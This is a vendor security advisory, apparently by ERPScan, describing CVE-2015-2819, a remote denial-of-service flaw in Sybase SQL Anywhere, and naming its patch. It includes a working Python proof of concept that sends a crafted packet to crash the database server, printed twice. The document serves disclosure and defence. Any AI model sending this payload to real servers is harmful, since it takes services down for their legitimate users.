Sybase SQL Anywhere 11 and 16 - DoS

Application: Sybase SQL Anywhere 11 and 16 Vendor URL:<http://www.sybase.com> **Bugs:**DoS **Reported:**09.12.2014 **Vendor response:**10.12.2014 **Date of Public Advisory:**15.03.2015 **Reference:**SAP Security Note 2108161 Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: DoS [CWE-122]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2819

Business Risk

It is possible to use a denial of service vulnerability to terminate the process of the vulnerable component. As a result, nobody can use this service, which negatively affects business processes. System downtime also harms business reputation.

Description

An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.

VULNERABLE PACKAGES

SYBASE SQL Anywhere 12 and 16
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2108161.

TECHNICAL DESCRIPTION

An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.

Proof of concept

import socket PoC = “\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54” \ “\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00” \ “\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \ “\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \ “\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00” \ “\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53” \ “\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00” \ “\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \ “\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \ “\x5f\x70\x72\x69\x6d\x61\x72\x79\x00” s = socket.socket() s.settimeout(1) s.connect((SERVER_IP, SERVER_PORT)) s.send(PoC) print(PoC) s.close()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

|

import socket

PoC = “\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54” \

“\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00” \

“\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \

“\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \

“\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00” \

“\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53” \

“\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00” \

“\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00” \

“\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33” \

“\x5f\x70\x72\x69\x6d\x61\x72\x79\x00”

s = socket.socket()

s.settimeout(1)

s.connect((SERVER_IP, SERVER_PORT))

s.send(PoC)

print(PoC)

s.close()

—|—

Defense

To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:

• SAP Vulnerability Assessment
• SAP Security Assessment
• SAP Security Trainings
• SAP Custom code security review
• SAP Penetration testing